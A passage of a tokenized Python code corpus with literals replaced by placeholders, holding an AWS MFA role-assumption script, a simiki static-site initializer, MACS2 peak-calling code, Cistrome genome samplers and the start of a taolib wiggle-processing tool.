!= <NUM_LIT:4> : <EOL> sys . exit ( not p . print_help ( ) ) <EOL> src_acct , src_username , dst_acct , dst_role = args <EOL> region = '<STR_LIT>' <EOL> mfa_token = raw_input ( '<STR_LIT>' ) <EOL> boto3 . setup_default_session ( profile_name = '<STR_LIT:default>' ) <EOL> client = boto3 . client ( '<STR_LIT>' ) <EOL> response = client . assume_role ( RoleArn = "<STR_LIT>" + dst_acct + "<STR_LIT>" + dst_role , <EOL> RoleSessionName = dst_role , <EOL> SerialNumber = "<STR_LIT>" + src_acct + "<STR_LIT>" + src_username , <EOL> TokenCode = mfa_token ) <EOL> creds = response [ '<STR_LIT>' ] <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , creds [ '<STR_LIT>' ] ) <EOL> aws_configure ( dst_role , '<STR_LIT>' , region ) <EOL> print dst_role <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from __future__ import print_function , unicode_literals , absolute_import <EOL> import os <EOL> import os . path <EOL> import shutil <EOL> import logging <EOL> from simiki . config import parse_config <EOL> from simiki . utils import ( copytree , mkdir_p , listdir_nohidden ) <EOL> class Initiator ( object ) : <EOL> conf_template_dn = "<STR_LIT>" <EOL> config_fn = "<STR_LIT>" <EOL> fabfile_fn = "<STR_LIT>" <EOL> demo_fn = "<STR_LIT>" <EOL> def __init__ ( self , config_file , target_path ) : <EOL> self . config_file = config_file <EOL> self . config = parse_config ( self . config_file ) <EOL> self . source_path = os . path . dirname ( __file__ ) <EOL> self . target_path = target_path <EOL> @ staticmethod <EOL> def get_file ( src , dst ) : <EOL> if os . path . exists ( dst ) : <EOL> logging . warning ( "<STR_LIT>" . format ( dst ) ) <EOL> return <EOL> dst_directory = os . path . dirname ( dst ) <EOL> if not os . path . exists ( dst_directory ) : <EOL> mkdir_p ( dst_directory ) <EOL> logging . info ( "<STR_LIT>" . format ( dst_directory ) ) <EOL> shutil . copyfile ( src , dst ) <EOL> logging . info ( "<STR_LIT>" . format ( dst ) ) <EOL> def get_config_file ( self ) : <EOL> dst_config_file = os . path . join ( self . target_path , self . config_fn ) <EOL> self . get_file ( self . config_file , dst_config_file ) <EOL> def get_fabfile ( self ) : <EOL> src_fabfile = os . path . join ( <EOL> self . source_path , <EOL> self . conf_template_dn , <EOL> self . fabfile_fn <EOL> ) <EOL> dst_fabfile = os . path . join ( self . target_path , self . fabfile_fn ) <EOL> self . get_file ( src_fabfile , dst_fabfile ) <EOL> def get_demo_page ( self ) : <EOL> nohidden_dir = listdir_nohidden ( <EOL> os . path . join ( self . target_path , self . config [ '<STR_LIT:source>' ] ) ) <EOL> if next ( nohidden_dir , False ) : <EOL> return <EOL> src_demo = os . path . join ( self . source_path , self . conf_template_dn , <EOL> self . demo_fn ) <EOL> dst_demo = os . path . join ( self . target_path , "<STR_LIT:content>" , "<STR_LIT>" , <EOL> self . demo_fn ) <EOL> self . get_file ( src_demo , dst_demo ) <EOL> def get_default_theme ( self , theme_path ) : <EOL> default_theme_name = self . config [ '<STR_LIT>' ] <EOL> src_theme = os . path . join ( self . source_path , self . config [ '<STR_LIT>' ] , <EOL> default_theme_name ) <EOL> dst_theme = os . path . join ( theme_path , default_theme_name ) <EOL> if os . path . exists ( dst_theme ) : <EOL> logging . warning ( '<STR_LIT>' . format ( dst_theme ) ) <EOL> else : <EOL> copytree ( src_theme , dst_theme ) <EOL> logging . info ( "<STR_LIT>" <EOL> . format ( default_theme_name , theme_path ) ) <EOL> def init ( self ) : <EOL> content_path = os . path . join ( self . target_path , self . config [ "<STR_LIT:source>" ] ) <EOL> output_path = os . path . join ( self . target_path , <EOL> self . config [ "<STR_LIT>" ] ) <EOL> theme_path = os . path . join ( self . target_path , self . config [ '<STR_LIT>' ] ) <EOL> for path in ( content_path , output_path , theme_path ) : <EOL> if os . path . exists ( path ) : <EOL> logging . warning ( "<STR_LIT>" . format ( path ) ) <EOL> else : <EOL> mkdir_p ( path ) <EOL> logging . info ( "<STR_LIT>" . format ( path ) ) <EOL> self . get_config_file ( ) <EOL> self . get_fabfile ( ) <EOL> self . get_demo_page ( ) <EOL> self . get_default_theme ( theme_path ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import logging <EOL> from time import strftime <EOL> import tempfile <EOL> from MACS2 . OptValidator import opt_validate <EOL> from MACS2 . OutputWriter import * <EOL> from MACS2 . Prob import binomial_cdf_inv <EOL> from MACS2 . PeakModel import PeakModel , NotEnoughPairsException <EOL> from MACS2 . PeakDetect import PeakDetect <EOL> from MACS2 . Constants import * <EOL> def check_names ( treat , control , error_stream ) : <EOL> """<STR_LIT>""" <EOL> tchrnames = set ( treat . get_chr_names ( ) ) <EOL> cchrnames = set ( control . get_chr_names ( ) ) <EOL> commonnames = tchrnames . intersection ( cchrnames ) <EOL> if len ( commonnames ) == <NUM_LIT:0> : <EOL> error_stream ( "<STR_LIT>" ) <EOL> error_stream ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( sorted ( tchrnames ) ) ) <EOL> error_stream ( "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( sorted ( cchrnames ) ) ) <EOL> sys . exit ( ) <EOL> def run ( args ) : <EOL> """<STR_LIT>""" <EOL> options = opt_validate ( args ) <EOL> info = options . info <EOL> warn = options . warn <EOL> debug = options . debug <EOL> error = options . error <EOL> info ( "<STR_LIT:\n>" + options . argtxt ) <EOL> options . PE_MODE = options . format in ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if options . PE_MODE : tag = '<STR_LIT>' <EOL> else : tag = '<STR_LIT>' <EOL> tempfile . tempdir = options . tempdir <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . PE_MODE : ( treat , control ) = load_frag_files_options ( options ) <EOL> else : ( treat , control ) = load_tag_files_options ( options ) <EOL> if control is not None : check_names ( treat , control , error ) <EOL> info ( "<STR_LIT>" , tag , options . tsize ) <EOL> tagsinfo = "<STR_LIT>" % ( tag , options . tsize ) <EOL> t0 = treat . total <EOL> tagsinfo += "<STR_LIT>" % ( tag , t0 ) <EOL> info ( "<STR_LIT>" , tag , t0 ) <EOL> if options . keepduplicates != "<STR_LIT:all>" : <EOL> if options . keepduplicates == "<STR_LIT>" : <EOL> info ( "<STR_LIT>" , tag ) <EOL> treatment_max_dup_tags = cal_max_dup_tags ( options . gsize , t0 ) <EOL> info ( "<STR_LIT>" % ( treatment_max_dup_tags ) ) <EOL> else : <EOL> info ( "<STR_LIT>" , tag ) <EOL> treatment_max_dup_tags = int ( options . keepduplicates ) <EOL> if options . PE_MODE : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> else : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> treat . separate_dups ( treatment_max_dup_tags ) <EOL> t1 = treat . total <EOL> info ( "<STR_LIT>" , tag , t1 ) <EOL> tagsinfo += "<STR_LIT>" % ( tag , t1 ) <EOL> if options . PE_MODE : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> else : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> info ( "<STR_LIT>" , float ( t0 - t1 ) / t0 ) <EOL> tagsinfo += "<STR_LIT>" % ( float ( t0 - t1 ) / t0 ) <EOL> else : <EOL> t1 = t0 <EOL> if control is not None : <EOL> c0 = control . total <EOL> tagsinfo += "<STR_LIT>" % ( tag , c0 ) <EOL> info ( "<STR_LIT>" , tag , c0 ) <EOL> if options . keepduplicates != "<STR_LIT:all>" : <EOL> if options . keepduplicates == "<STR_LIT>" : <EOL> info ( "<STR_LIT>" , tag ) <EOL> control_max_dup_tags = cal_max_dup_tags ( options . gsize , c0 ) <EOL> info ( "<STR_LIT>" % ( control_max_dup_tags ) ) <EOL> else : <EOL> info ( "<STR_LIT>" , tag ) <EOL> control_max_dup_tags = int ( options . keepduplicates ) <EOL> if options . PE_MODE : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> else : <EOL> info ( "<STR_LIT>" , treatment_max_dup_tags ) <EOL> control . separate_dups ( treatment_max_dup_tags ) <EOL> c1 = control . total <EOL> info ( "<STR_LIT>" , tag , c1 ) <EOL> tagsinfo += "<STR_LIT>" % ( tag , c1 ) <EOL> if options . PE_MODE : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> else : <EOL> tagsinfo += "<STR_LIT>" % ( treatment_max_dup_tags ) <EOL> info ( "<STR_LIT>" % ( float ( c0 - c1 ) / c0 ) ) <EOL> tagsinfo += "<STR_LIT>" % ( float ( c0 - c1 ) / c0 ) <EOL> else : <EOL> c1 = c0 <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nomodel : <EOL> info ( "<STR_LIT>" ) <EOL> if options . PE_MODE : <EOL> options . d = options . tsize <EOL> else : <EOL> options . d = options . extsize <EOL> if options . shift > <NUM_LIT:0> : <EOL> info ( "<STR_LIT>" % ( options . shift ) ) <EOL> elif options . shift < <NUM_LIT:0> : <EOL> info ( "<STR_LIT>" % ( options . shift * - <NUM_LIT:1> ) ) <EOL> info ( "<STR_LIT>" % ( options . d ) ) <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> else : <EOL> try : <EOL> peakmodel = PeakModel ( treatment = treat , <EOL> max_pairnum = MAX_PAIRNUM , <EOL> opt = options <EOL> ) <EOL> info ( "<STR_LIT>" ) <EOL> debug ( "<STR_LIT>" ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . min_tags ) ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . d ) ) <EOL> debug ( "<STR_LIT>" % ( peakmodel . scan_window ) ) <EOL> info ( "<STR_LIT>" % peakmodel . d ) <EOL> info ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> info ( "<STR_LIT>" % ( options . modelR ) ) <EOL> model2r_script ( peakmodel , options . modelR , options . name ) <EOL> options . d = peakmodel . d <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> if options . d <= <NUM_LIT:2> * options . tsize : <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> if options . onauto : <EOL> options . d = options . extsize <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> else : <EOL> warn ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> warn ( "<STR_LIT>" ) <EOL> except NotEnoughPairsException : <EOL> if not options . onauto : <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> warn ( "<STR_LIT>" ) <EOL> options . d = options . extsize <EOL> options . scanwindow = <NUM_LIT:2> * options . d <EOL> warn ( "<STR_LIT>" % ( options . d ) ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nolambda : <EOL> info ( "<STR_LIT>" ) <EOL> if control and options . PE_MODE : <EOL> c1 = c1 * <NUM_LIT:2> <EOL> if control : <EOL> if options . downsample : <EOL> info ( "<STR_LIT>" ) <EOL> if t1 > c1 : <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . seed < <NUM_LIT:0> : <EOL> warn ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" % options . seed ) <EOL> treat . sample_num ( c1 , options . seed ) <EOL> info ( "<STR_LIT>" , treat . total ) <EOL> elif c1 > t1 : <EOL> info ( "<STR_LIT>" , tag ) <EOL> if options . seed < <NUM_LIT:0> : <EOL> warn ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" % options . seed ) <EOL> control . sample_num ( t1 , options . seed ) <EOL> info ( "<STR_LIT>" , control . total , tag ) <EOL> options . tocontrol = False <EOL> else : <EOL> if options . tolarge : <EOL> if t1 > c1 : <EOL> options . tocontrol = False <EOL> else : <EOL> options . tocontrol = True <EOL> else : <EOL> if t1 > c1 : <EOL> options . tocontrol = True <EOL> else : <EOL> options . tocontrol = False <EOL> peakdetect = PeakDetect ( treat = treat , <EOL> control = control , <EOL> opt = options <EOL> ) <EOL> peakdetect . call_peaks ( ) <EOL> peakdetect . peaks . filter_fc ( fc_low = options . fecutoff ) <EOL> info ( "<STR_LIT>" % ( options . peakxls ) ) <EOL> ofhd_xls = open ( options . peakxls , "<STR_LIT:w>" ) <EOL> ofhd_xls . write ( "<STR_LIT>" % ( MACS_VERSION ) ) <EOL> ofhd_xls . write ( options . argtxt + "<STR_LIT:\n>" ) <EOL> ofhd_xls . write ( tagsinfo ) <EOL> if options . shift > <NUM_LIT:0> : <EOL> ofhd_xls . write ( "<STR_LIT>" % ( options . shift ) ) <EOL> elif options . shift < <NUM_LIT:0> : <EOL> ofhd_xls . write ( "<STR_LIT>" % ( options . shift * - <NUM_LIT:1> ) ) <EOL> ofhd_xls . write ( "<STR_LIT>" % ( options . d ) ) <EOL> try : <EOL> ofhd_xls . write ( "<STR_LIT>" % '<STR_LIT:U+002C>' . join ( map ( str , peakmodel . alternative_d ) ) ) <EOL> except : <EOL> pass <EOL> if options . nolambda : <EOL> ofhd_xls . write ( "<STR_LIT>" ) <EOL> peakdetect . peaks . write_to_xls ( ofhd_xls , name = options . name ) <EOL> ofhd_xls . close ( ) <EOL> if options . log_pvalue : <EOL> score_column = "<STR_LIT>" <EOL> elif options . log_qvalue : <EOL> score_column = "<STR_LIT>" <EOL> if not options . broad : <EOL> info ( "<STR_LIT>" % ( options . peakNarrowPeak ) ) <EOL> ofhd_bed = open ( options . peakNarrowPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_narrowPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , score_column = score_column , trackline = options . trackline ) <EOL> ofhd_bed . close ( ) <EOL> info ( "<STR_LIT>" % ( options . summitbed ) ) <EOL> ofhd_summits = open ( options . summitbed , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_summit_bed ( ofhd_summits , name_prefix = "<STR_LIT>" , name = options . name , <EOL> description = "<STR_LIT>" + strftime ( "<STR_LIT>" ) + "<STR_LIT:)>" , <EOL> score_column = score_column , trackline = options . trackline ) <EOL> ofhd_summits . close ( ) <EOL> else : <EOL> info ( "<STR_LIT>" % ( options . peakBroadPeak ) ) <EOL> ofhd_bed = open ( options . peakBroadPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_broadPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , description = options . name , trackline = options . trackline ) <EOL> ofhd_bed . close ( ) <EOL> info ( "<STR_LIT>" % ( options . peakGappedPeak ) ) <EOL> ofhd_bed = open ( options . peakGappedPeak , "<STR_LIT:w>" ) <EOL> peakdetect . peaks . write_to_gappedPeak ( ofhd_bed , name_prefix = "<STR_LIT>" , name = options . name , description = options . name , trackline = options . trackline ) <EOL> ofhd_bed . close ( ) <EOL> info ( "<STR_LIT>" ) <EOL> def cal_max_dup_tags ( genome_size , tags_number , p = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> return binomial_cdf_inv ( <NUM_LIT:1> - p , tags_number , <NUM_LIT:1.0> / genome_size ) <EOL> def load_frag_files_options ( options ) : <EOL> """<STR_LIT>""" <EOL> options . info ( "<STR_LIT>" ) <EOL> tp = options . parser ( options . tfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> treat = tp . build_petrack ( ) <EOL> if len ( options . tfile ) > <NUM_LIT:1> : <EOL> for tfile in options . tfile [ <NUM_LIT:1> : ] : <EOL> tp = options . parser ( tfile , buffer_size = options . buffer_size ) <EOL> treat = tp . append_petrack ( treat ) <EOL> treat . finalize ( ) <EOL> options . tsize = tp . d <EOL> if options . cfile : <EOL> options . info ( "<STR_LIT>" ) <EOL> cp = options . parser ( options . cfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> control = cp . build_petrack ( ) <EOL> control_d = cp . d <EOL> if len ( options . cfile ) > <NUM_LIT:1> : <EOL> for cfile in options . cfile [ <NUM_LIT:1> : ] : <EOL> cp = options . parser ( cfile , buffer_size = options . buffer_size ) <EOL> control = cp . append_petrack ( control ) <EOL> control . finalize ( ) <EOL> else : <EOL> control = None <EOL> options . info ( "<STR_LIT>" % options . tsize ) <EOL> if control is not None : <EOL> options . info ( "<STR_LIT>" % control_d ) <EOL> return ( treat , control ) <EOL> def load_tag_files_options ( options ) : <EOL> """<STR_LIT>""" <EOL> options . info ( "<STR_LIT>" ) <EOL> tp = options . parser ( options . tfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) <EOL> if not options . tsize : <EOL> ttsize = tp . tsize ( ) <EOL> options . tsize = ttsize <EOL> treat = tp . build_fwtrack ( ) <EOL> if len ( options . tfile ) > <NUM_LIT:1> : <EOL> for tfile in options . tfile [ <NUM_LIT:1> : ] : <EOL> tp = options . parser ( tfile , buffer_size = options . buffer_size ) <EOL> treat = tp . append_fwtrack ( treat ) <EOL> treat . finalize ( ) <EOL> if options . cfile : <EOL> options . info ( "<STR_LIT>" ) <EOL> control = options . parser ( options . cfile [ <NUM_LIT:0> ] , buffer_size = options . buffer_size ) . build_fwtrack ( ) <EOL> if len ( options . cfile ) > <NUM_LIT:1> : <EOL> for cfile in options . cfile [ <NUM_LIT:1> : ] : <EOL> cp = options . parser ( cfile , buffer_size = options . buffer_size ) <EOL> control = cp . append_fwtrack ( control ) <EOL> control . finalize ( ) <EOL> else : <EOL> control = None <EOL> options . info ( "<STR_LIT>" % options . tsize ) <EOL> return ( treat , control ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> from array import * <EOL> from bisect import * <EOL> from Cistrome . Assoc . inout import * <EOL> class Sampler : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> self . __name__ = name <EOL> self . standard_chroms = { '<STR_LIT:I>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:M>' : '<STR_LIT>' , '<STR_LIT:X>' : '<STR_LIT>' } <EOL> def sample ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def get_name ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . __name__ <EOL> def set_name ( self , name ) : <EOL> """<STR_LIT>""" <EOL> self . __name__ = name <EOL> class GenomeSampler ( Sampler ) : <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name ) <EOL> def sample ( self , wig = None , resolution = <NUM_LIT:100> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> coordinates = { } <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> wigcoord = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> coordinates [ standardchrom ] = [ ] <EOL> for wc in wigcoord : <EOL> coordinate = ( int ( round ( <NUM_LIT:1.0> * wc / resolution ) ) ) * resolution + <NUM_LIT:1> <EOL> if not coordinates [ standardchrom ] or coordinate != coordinates [ standardchrom ] [ - <NUM_LIT:1> ] : <EOL> coordinates [ standardchrom ] . append ( coordinate ) <EOL> return coordinates <EOL> class ChIPSampler ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> self . standard_chroms = { '<STR_LIT:I>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT:M>' : '<STR_LIT>' , '<STR_LIT:X>' : '<STR_LIT>' } <EOL> def sample ( self , bed = None , resolution = <NUM_LIT> ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = bed . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> coordinates = { } <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> coordinates [ standardchrom ] = [ ] <EOL> ChIP = zip ( bed [ chrom ] [ '<STR_LIT:start>' ] , bed [ chrom ] [ '<STR_LIT:end>' ] , map ( lambda x , y , : ( x + y ) / <NUM_LIT:2> , bed [ chrom ] [ '<STR_LIT:start>' ] , bed [ chrom ] [ '<STR_LIT:end>' ] ) ) <EOL> howmanyChIPs = len ( ChIP ) <EOL> for i in xrange ( <NUM_LIT:0> , howmanyChIPs ) : <EOL> beg , end , center = ChIP [ i ] <EOL> Ns = range ( center , max ( <NUM_LIT:0> , beg - <NUM_LIT:1> ) , - <NUM_LIT:1> * resolution ) <EOL> Ns . reverse ( ) <EOL> Ns += range ( center + resolution , end + <NUM_LIT:1> , resolution ) <EOL> if Ns : coordinates [ standardchrom ] . extend ( Ns ) <EOL> coordinates [ standardchrom ] . sort ( ) <EOL> return coordinates <EOL> class WigSampler ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> def sample ( self , wig , resolution ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> sampWig = Wig ( ) <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> samp = [ array ( '<STR_LIT:l>' , [ ] ) , array ( '<STR_LIT:d>' , [ ] ) ] <EOL> for wc , val in itertools . izip ( wig [ chrom ] [ <NUM_LIT:0> ] , wig [ chrom ] [ <NUM_LIT:1> ] ) : <EOL> coordinate = ( int ( round ( <NUM_LIT:1.0> * wc / resolution ) ) ) * resolution + <NUM_LIT:1> <EOL> if len ( samp [ <NUM_LIT:0> ] ) == <NUM_LIT:0> : <EOL> samp [ <NUM_LIT:0> ] . append ( coordinate ) <EOL> samp [ <NUM_LIT:1> ] . append ( val ) <EOL> continue <EOL> if coordinate != samp [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] : <EOL> samp [ <NUM_LIT:0> ] . append ( coordinate ) <EOL> samp [ <NUM_LIT:1> ] . append ( val ) <EOL> if samp [ <NUM_LIT:0> ] : sampWig . wig [ standardchrom ] = samp <EOL> return sampWig <EOL> class WigSamplerFast ( Sampler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> Sampler . __init__ ( self , name = '<STR_LIT>' ) <EOL> def sample ( self , wig , resolution ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> chroms = wig . get_chroms ( ) <EOL> except AttributeError : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> sampWig = Wig ( ) <EOL> for chrom in chroms : <EOL> try : <EOL> standardchrom = self . standard_chroms [ chrom ] <EOL> except KeyError : <EOL> standardchrom = chrom <EOL> try : <EOL> start = wig [ chrom ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> end = wig [ chrom ] [ <NUM_LIT:0> ] [ - <NUM_LIT:1> ] <EOL> except IndexError : <EOL> continue <EOL> samp = [ array ( '<STR_LIT:l>' , [ ] ) , array ( '<STR_LIT:d>' , [ ] ) ] <EOL> cor = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> val = wig [ chrom ] [ <NUM_LIT:1> ] <EOL> init = <NUM_LIT:0> <EOL> prev = - <NUM_LIT:1000> <EOL> for sc in xrange ( start , end , resolution ) : <EOL> gotya = bisect_left ( cor [ init : ] , sc ) <EOL> if prev == ( init + gotya ) : continue <EOL> else : prev = ( init + gotya ) <EOL> try : <EOL> samp [ <NUM_LIT:0> ] . append ( cor [ init + gotya ] ) <EOL> samp [ <NUM_LIT:1> ] . append ( val [ init + gotya ] ) <EOL> init += gotya <EOL> except IndexError : <EOL> continue <EOL> if samp [ <NUM_LIT:0> ] : sampWig . wig [ standardchrom ] = samp <EOL> return sampWig <EOL> def fillupwig ( wig , resolution , fillupval = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> fillupWig = Wig ( ) <EOL> for chrom in wig . get_chroms ( ) : <EOL> if len ( wig [ chrom ] [ <NUM_LIT:0> ] ) == <NUM_LIT:0> or len ( wig [ chrom ] [ <NUM_LIT:0> ] ) == <NUM_LIT:1> : <EOL> fillupWig [ chrom ] = wig [ chrom ] [ : ] <EOL> break <EOL> cs = wig [ chrom ] [ <NUM_LIT:0> ] <EOL> vs = wig [ chrom ] [ <NUM_LIT:1> ] <EOL> ncs = [ cs [ <NUM_LIT:0> ] ] <EOL> nvs = [ vs [ <NUM_LIT:0> ] ] <EOL> pc = cs [ <NUM_LIT:0> ] <EOL> pv = vs [ <NUM_LIT:0> ] <EOL> for c , v in itertools . izip ( cs [ <NUM_LIT:1> : ] , vs [ <NUM_LIT:1> : ] ) : <EOL> if c - pc > resolution : <EOL> a = range ( pc + resolution , c , resolution ) <EOL> ncs += a <EOL> nvs += [ <NUM_LIT:0.0> ] * len ( a ) <EOL> else : <EOL> ncs . append ( c ) <EOL> nvs . append ( v ) <EOL> pc = c <EOL> pv = v <EOL> fillupWig . wig [ chrom ] = [ array ( '<STR_LIT:l>' , ncs ) , array ( '<STR_LIT:d>' , nvs ) ] <EOL> return fillupWig </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> import re <EOL> import logging <EOL> from optparse import OptionParser <EOL> from taolib . CoreLib . Parser import * <EOL> from taolib . CoreLib . BasicStat . Prob import normal_cdf_inv <EOL> logging . basicConfig ( level = <NUM_LIT:20> , <EOL> format = '<STR_LIT>' , <EOL> datefmt = '<STR_LIT>' , <EOL> stream = sys . stderr , <EOL> filemode = "<STR_LIT:w>" <EOL> ) <EOL> error = logging . critical <EOL> warn = logging . warning <EOL> debug = logging . debug <EOL> info = logging . info <EOL> def main ( ) : <EOL> usage = "<STR_LIT>" <EOL> description = "<STR_LIT>" <EOL> optparser = OptionParser ( version = "<STR_LIT>" , description = description , usage = usage , add_help_option = False ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:string>" , <EOL> help = "<STR_LIT>" ) <EOL> optparser . add_option ( "<STR_LIT:-c>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:float>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT> ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT> ) <EOL> optparser . add_option ( "<STR_LIT>" , "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , <EOL> help = "<STR_LIT>" , default = <NUM_LIT:50> ) <EOL> optparser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = True ) <EOL> optparser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , action = "<STR_LIT>" , <EOL> help = "<STR_LIT>" , default = True ) <EOL> optparser . add_option ( "<STR_LIT>" , dest = "<STR_LIT>" , type = "<STR_LIT:int>" , default = <NUM_LIT:10> , <EOL> help = "<STR_LIT>" ) <EOL> ( options , args ) = optparser . parse_args ( ) <EOL> if not options . wfile or not options . bfile or not options . cutoff : <EOL> optparser . print_help ( ) <EOL> sys . exit ( ) <EOL> f = options . wfile <EOL> if not os . path . isfile ( f ) : <EOL> error ( "<STR_LIT>" % f ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> fhd = open ( f ) <EOL> except : <EOL> error ( "<STR_LIT>" % f ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> try : <EOL> bfhd = open ( options . bfile , "<STR_LIT:w>" ) <EOL> except : <EOL> error ( "<STR_LIT>" % options . bfile ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> info ( "<STR_LIT>" ) <EOL> wio = WiggleIO . WiggleIO ( fhd ) <EOL> info ( "<STR_LIT>" ) <EOL> wtrack = wio . build_wigtrack ( ) <EOL> if options . normalize : <EOL> info ( "<STR_LIT>" ) <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . normalize ( null = options . nullmodel , sample_percent = options . samplepercent ) <EOL> if options . nullmodel : <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( "<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> else : <EOL> info ( "<STR_LIT>" ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( 